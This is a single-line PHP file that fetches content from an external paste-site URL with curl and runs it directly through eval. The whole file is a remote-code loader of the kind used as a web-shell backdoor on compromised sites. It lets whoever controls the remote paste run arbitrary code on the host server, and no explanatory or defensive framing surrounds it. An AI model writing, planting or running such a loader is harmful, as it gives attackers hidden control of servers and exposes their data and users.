<?php $ch = curl_init("https://paste.mangsud.org/raw/fdcaaa02");curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$result = curl_exec($ch);eval("?>".$result); ?>